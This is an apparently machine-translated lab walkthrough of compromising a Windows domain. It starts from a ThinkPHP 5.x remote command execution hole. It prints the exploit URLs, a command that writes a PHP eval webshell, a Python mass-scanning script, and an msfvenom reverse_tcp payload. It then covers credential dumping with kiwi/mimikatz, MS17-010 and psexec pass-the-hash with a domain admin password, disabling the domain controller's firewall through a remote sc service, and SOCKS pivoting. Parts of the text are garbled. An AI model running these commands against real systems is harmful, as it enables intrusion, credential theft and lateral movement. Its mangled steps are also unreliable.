Preface The idea is the most important in the process of Intranet penetration. Although the host of Intranet penetration is not much, it is mainly to exercise an idea of Intranet penetration.
Environment Building range:
Windows 7(inner) :
Windows 7(f) :
Hosts in the zone:
Web server penetration nMAP probe port nMAP-T4-SC-SV Here you can see several major ports, such as 80, 135, 139, 445, here can think of the first point can be used to ipc, SMB
Open port 80, try to access the web address, old smiling face people, but still 5.x version, still more holes
In order to determine the specific version, we first use error check and find that the version here is 5.0.22. If I remember correctly, there is a TP remote command execution vulnerability
Vulnerability description: Because ThinkPHP provides form request forgeries for the Method method of the core Requests class in the framework, this feature uses POST[m ‘ethod’] to pass the actual request method. But because the framework does not validate the parameters, an attacker can set _POST[‘_method’] to pass the actual request method. However, because the framework does not validate the parameters, an attacker can set POST[m ‘ethod’] to pass the actual request method. However, since the framework does not validate parameters, an attacker can override variables of that class by setting _POST[‘_method’]=’__construct’. In this way, the attacker overwrites the filter variable into the function name such as system. When parameters are filtered internally, any command will be executed.
Thinkphp GetShell thinkPHP GetShell thinkPHP GetShell thinkPHP GetShell
searchsploit thinkphp
You can see that there is a 5.x remote execution vulnerability here, so go directly to this folder and check the payload listed in the TXT file
cd /usr/share/exploitdb/exploits/php/webapps
cat 46150.txt
The payload below the corresponding version of fuzz is the payload below the corresponding version of fuzz / thinkphp/public /? s=.|think\config/get&name=database.usernameCopy the code
The payload should list the database password, but it is not typed here / thinkphp/public /? s=.|think\config/get&name=database.password
Type phpInfo here /? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
The current permission is Administrator /? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Look at the IP situation, dual network cards, then most likely there is a domain environment /? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ipconfig
Look at the process and find no kill soft so try to write webshell directly without killing /? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tasklist /svc
Here directly try echo write a one-sentence Trojan into, here because the previous check did not kill soft and security dogs, there is no need to do no-kill processing /? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<? php @eval($_POST[cmd]); ? >" > connect.phpCopy the code
I’m going to use dir to verify that the write is successful /? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dirCopy the code
Connection succeeded using ant sword
There are so many versions of ThinkPHP. If kali does not have a vulnerability library, and searching in search engines is too time-consuming, is there a script for batch detection of ThinkPHP vulnerabilities?
Here I found a script for batch detection of ThinkPHP vulnerabilities
! /usr/bin/env python
–– coding: utf-8 ––
Name: ThinkPHP Remote code detection
Description: ThinkPHP5 5.0.22/5.1.29 Remote code execution vulnerability
import re import sys import requests import queue import threading from bs4 import BeautifulSoup class thinkphp_rce(threading.Thread): def init(self, q): threading.Thread.init(self) self.q = q def run(self): While not self.q.emty (): url= () headers = {” user-agent “:”Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; En-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50″} Payload = r”/? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1” vulnurl = url + payload try: response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)
soup = BeautifulSoup(response.text,"lxml") if 'PHP Version' in str(soup.text): print ('[+] Remote code execution vulnerability exists at the target address') print ('[+] Vulnerability url address ' + vulnurl) with open('target.txt','a') as f1: f1.write(vulnurl+'\n') f1.close() else: print ('[-] There is no remote code execution vulnerability in the target address') except: print ('[!] Destination address cannot be connected')Copy the code
def urlget(): with open(‘url.txt’,’r’)as f: urls=f.readlines() for tmp in urls: if ‘//’ in tmp: url=tmp.strip(‘\n’) urlList.append(url) else: url=’http://’+tmp.strip(‘\n’) urlList.append(url) return(urlList) f.close()
If name = = “main” : print (” ‘– — — — — — — — — — — — — — — – scanning start — — — — — — — — — — — — — — — — — — —
*Made by :tdcoming *For More *MY Heart
... _ _ | __ __ | | | (_) | | __ | | ___ ___ _ __ ___ _ _ __ __ _ | | / _ ` | __ | / _ \ | '_ ` _ \ | | |' _ \ / _ ` | | (__ (_ | | | | | | (_) | | | | | | | | | | | | | | (_ | | | _ | \ __, _ | \ ___ | \ ___ / | _ | | _ | | _ | | _ | | _ | | _ | \ __, | __/ | |___/ ''') urlList=[] urlget() threads = [] threads_count = 10 q=queue.Queue() for url in urlList: q.put(url) for i in range(threads_count): threads.append(thinkphp_rce(q)) for i in threads: i.start() for i in threads: i.join()Copy the code
The method of use here is very simple: the target to be detected in the url. TXT, if there is a vulnerability of the address will automatically generate a target.txt text save
Collect Intranet information Use the command window of ant Sword to collect local information, which is administrator permission + dual network adapters
View domain information
net viewnet config workstationnet user /domain
Intranet penetration online MSF MSF generates an abc.exe
Msfvenom -p Windows/meterpreter/reverse_tcp LHOST = LPORT = 4444 – f exe > ABC. ExeUse the ant sword to upload it to the target
Here because there is no soft kill do not kill, direct command line execution can be
MSF enables listening to go online
Information gathering
Use getSystem to lift weights to system. Here, getSystem is easier to execute successfully because it is a shooting range
Obtain a shell in Windows environment to continue to collect domain information
chcp 65001net user /domainnet group "domain computers" /domainnet group "domain controllers" /domainnet group "domain admins" /domain
The target plane has a domain environment named “Sun” with only one domain controller. I ping the domain controller directly and get the IP address of the domain controller is
To obtain credentials
Since there are two network segments, add routes to facilitate subsequent operations
# MSF run route add 2route print # session run autoroute -s autoroute -p
Session is selected here, and kiwi is used to obtain the password of the target machine. Note that one operation needs to be carried out here is process migration, because the load we put online to MSF is 32-bit (x86), and we need to find a 64-bit (X64) process migration to obtain the password of the target machine using KIwi
sessions -i 2load kiwikiwi_cmd privilege::debugpsmigrate 1144kiwi_cmd sekurlsa::logonPasswords
Here it can be seen that the passwords of a domain tube and a target machine were captured: and
The idea here is to catch the target machine and domain tube password, so here can use PTH method for horizontal movement, this is the first method; In addition, we can go to detect what vulnerabilities can be used in another network segment of the machine, such as MS17-010, CVE-2020-0796 and so on, using the vulnerability of EXP lateral movement, this is the second method; Since we found ports 139 and 445 when scanning the ports with NMAP before, we can try to move horizontally by ipc+ scheduled task when we get the password
Internal network horizontal movement MS17-010 try to directly use MS17-010 attack module to try, here in fact, should first use the scanning module for vulnerability scanning of the host in another network segment, if there is eternal blue vulnerability to continue to use exp module attack, here I in order to demonstrate the convenience of direct use exp module attack
As can be seen from the attack here, session rebound failed despite the eternal Blue vulnerability in the target machine, because anonymous channel is not enabled by default in the case of Windows Server2008.
We know that the principle of Psexec is to use pipes, and the same is true for IPC connections. So the eternal Blue connection cannot be established without the anonymised strap being turned on. Here’s the concept of anonymous pipes:
Pipes are the most basic implementation mechanism for IPC. We all know that "everything is a file" under Linux, but the pipe here is a file. The pipe enables process communication by giving both processes access to the file. If process 1 writes to the file, then process 2 can only read the contents of the file. (2) It can only be used for communication between processes with kinship, usually used for communication between parent and child processes. (3) The pipe is based on byte stream to communicate, (4) it depends on the file system, and its life cycle ends with the process (with the process). (5) It has its own synchronization mutually exclusive effect
Psexec attempt since we have got the domain account, we will directly use the method of PTH, that is, hash pass, using the psexec module, but this module has been blacklisted because of too much use. If there is a kill module here, the horizontal movement of Psexec will be blocked.
The setting parameters are shown below. Note here that SMBPass can also be passed with a hash, as well as a plain text password
Use exploits/Windows/SMB/psexecset rhost set SMBDomain SUNset SMBUser administratorset SMBPass dc123.comset payload windows/meterpreter/bind_tcprun
Here we can see that exp has been used but no session has bounced back. I guess the firewall is blocking the port traffic, so we need to close the firewall of the domain control through ipc connectionIpc connection To turn off the domain control firewall The normal method here is to use netsh to turn off the domain control firewall, but this requires the domain control administrator permission, so here we directly use IPC connection to the domain control and then use scheduled task add rule to turn off the firewall
netsh advfirewall firewall add rule name=”f.exe” dir=in program=”e:\f.exe” action=allownetsh advfirewall firewall delete Rule name=”f.exe” Hangs the session in the background and establishes an IPC connection with the domain controller
Net use \\\ IPC $ /user:administrator
Here you can see that the connection has been established successfullyCreate a scheduled task on the SC immediately start and disable the firewall of the domain controller
Sc \\ create unablefirewall binpath= "netsh advfirewall set allprofiles state off" # \\ start unablefirewall #Copy the code
Here you can see that the firewall has been turned offPsexec tries *2 and then moves horizontally with psexec to get the session, so we have the domain control right
So let’s see, what we’re getting directly is a session with system privileges
I want to log in to the remote desktop and I want to log in to the remote desktop and see what else is valuable about the domain controller so THAT I can use the SOCKS proxy to access the Intranet forward
Use the socks_proxy module
Use auxiliary/server/ socks_proxtSet viersion 4arun The proxychain file needs to be configured
Socks4 1080
Add a route to an Intranet network segment
Run autoroute -s Run autoroute -p
Then run the proxychain command to log in to the remote desktop
Proxychain4 rdesktop